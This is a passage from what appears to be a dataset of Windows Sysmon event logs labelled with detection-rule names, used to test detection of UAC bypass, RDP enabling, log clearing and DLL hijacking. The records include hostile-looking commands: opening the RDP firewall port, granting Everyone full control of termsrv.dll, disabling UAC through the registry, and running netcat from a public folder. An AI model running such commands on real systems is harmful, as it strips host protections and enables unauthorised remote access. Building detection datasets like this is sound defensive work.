20:17:45.618","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\uninstall.bat","UtcTime":"2019-03-17 20:17:45.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5256,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.628580Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.648","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\update.bat","UtcTime":"2019-03-17 20:17:45.648"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5257,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.648609Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"%%ProgramFiles%%\\RDP Wrapper\\rdpwrap.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\TermService\\Parameters\\ServiceDll","UtcTime":"2019-03-17 20:18:05.086"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5265,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:05.086560Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware","RDP Registry Modification","RDP Sensitive Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5267,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ProcessId":3700,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5269,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.282593Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port or Application Allowed","Netsh RDP Port Opening"],"event":{"Event":{"EventData":{"CommandLine":"netsh advfirewall firewall add rule name=\"Remote Desktop\" dir=in protocol=tcp localport=3389 profile=any action=allow","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=784A50A6A09C25F011C3143DDD68E729,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst\" -i -o","ParentImage":"C:\\Users\\IEUser\\Desktop\\RDPWrap-v1.6.2\\RDPWInst.exe","ParentProcessGuid":"365ABB72-AB70-5C8E-0000-0010DF1F0A00","ParentProcessId":3700,"ProcessGuid":"365ABB72-AB81-5C8E-0000-001024960C00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:18:09.272"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5270,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:18:09.312636Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant %%username%%:F","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010296C0D00","ProcessId":3536,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.897"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5312,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.917561Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["File or Folder Permissions Modifications"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\icacls.exe\" C:\\Windows\\System32\\termsrv.dll /grant *S-1-1-0:(F)","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\","Description":"","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=1542A92D5C6F7E1E80613F3466C9CE7F,IMPHASH=A4B760A1A7F466099EAA530F2CC4EF63","Image":"C:\\Windows\\System32\\icacls.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-A960-5C8E-0000-002004C00300","LogonId":"0x3c004","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe\" ","ParentImage":"C:\\Users\\IEUser\\Desktop\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch_20090425\\UniversalTermsrvPatch-x86.exe","ParentProcessGuid":"365ABB72-ABFE-5C8E-0000-00105A560D00","ParentProcessId":4024,"ProcessGuid":"365ABB72-AC01-5C8E-0000-0010656E0D00","ProcessId":3652,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"PC04\\IEUser","UtcTime":"2019-03-17 20:20:17.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":5313,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:20:17.927576Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000050)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"365ABB72-AC79-5C8E-0000-0010E1B50D00","ProcessId":2872,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber","UtcTime":"2019-03-17 20:22:59.399"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":13,"EventRecordID":5329,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:22:59.399761Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"System":{"Channel":"System","Computer":"PC01.example.corp","Correlation":null,"EventID":104,"EventRecordID":27736,"Execution_attributes":{"ProcessID":812,"ThreadID":3916},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security_attributes":{"UserID":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:34:25.894341Z"},"Version":0},"UserData":{"LogFileCleared":{"BackupPath":"","Channel":"System","SubjectDomainName":"EXAMPLE","SubjectUserName":"user01"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-04-30 10:12:45.583","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"365ABB72-1EFA-5CC8-0000-0010D3DE1C00","ProcessId":3292,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\bs.ps1","UtcTime":"2019-04-30 10:12:45.583"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":8930,"Execution_attributes":{"ProcessID":1956,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-04-30T10:12:45.583363Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"DFAE8213-70EB-5CDD-0000-0010F66D0A00","ProcessId":3788,"RuleName":"technique_id=T1088,technique_name=Bypass User Account Control","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system\\EnableLUA","UtcTime":"2019-05-16 14:17:15.758"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":13,"EventRecordID":18619,"Execution_attributes":{"ProcessID":1780,"ThreadID":2204},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-16T14:17:15.763712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Office Security Settings Changed"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","ProcessGuid":"365ABB72-92DF-5CDB-0000-0010A15E1300","ProcessId":3804,"RuleName":"Defense Evasion - access to the VBA project object model in the Macro Settings changed","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM","UtcTime":"2019-05-15 04:18:40.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":17915,"Execution_attributes":{"ProcessID":2024,"ThreadID":1212},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-15T04:18:40.474644Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\HCJVGQ5XQYJQFTRJAKRF.temp","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419627,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.787882Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 16:27:10.777","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1B5E-5F8B-0000-001034322200","ProcessId":2720,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP","UtcTime":"2020-10-17 16:27:10.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":419628,"Execution_attributes":{"ProcessID":3344,"ThreadID":4376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T16:27:10.791010Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc stop CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"sc.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A17-5E76-0000-001062373A00","ProcessId":4876,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:35.023"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244333,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:35.026859Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"net start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-077C-5E76-0000-0010A5BA2300","ParentProcessId":5068,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ProcessId":7072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.872"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244336,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.876452Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Service Execution"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 start CDPSvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=085E23DF67774ED89FD0215E1F144824F79F812B,MD5=63DD4523677E62A73A8A7494DB321EA2,SHA256=C687157FD58EAA51757CDA87D06C30953A31F03F5356B9F5A9C004FA4BAD4BF5,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-06A4-5E76-0000-002043DE0200","LogonId":"0x2de43","OriginalFileName":"net1.exe","ParentCommandLine":"net start CDPSvc","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"747F3D96-0A2B-5E76-0000-0010C02A3D00","ParentProcessId":7072,"ProcessGuid":"747F3D96-0A2B-5E76-0000-0010A92C3D00","ProcessId":7664,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:35:55.891"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244337,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:35:55.897450Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-069C-5E76-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-08DA-5E76-0000-001054382E00","ParentProcessId":2632,"ProcessGuid":"747F3D96-0A33-5E76-0000-0010B8813D00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 12:36:03.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244341,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:03.901088Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"c:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-06A4-5E76-0000-002087DE0200","LogonId":"0x2de87","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-06EF-5E76-0000-0010DC301A00","ParentProcessId":6236,"ProcessGuid":"747F3D96-0A36-5E76-0000-0010C8923D00","ProcessId":488,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:36:06.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244342,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:06.990686Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Fax Service DLL Search Order Hijack"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=9D1873AEFC3F59E649F3FB822C1FA3D52C39970E,MD5=9B97E05E67107AA18BBF3E4F5F121B2B,SHA256=9915C62360EFF866C09072AF754FA70A9BD4BF4A73CDB4048F415002F7256AD0,IMPHASH=DF1295012B8EB2127DC3667CF1881634","Image":"C:\\Windows\\System32\\FXSSVC.exe","ImageLoaded":"C:\\Windows\\System32\\Ualapi.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-E8A7-5F26-0000-0010230D1A00","ProcessId":5252,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-08-02 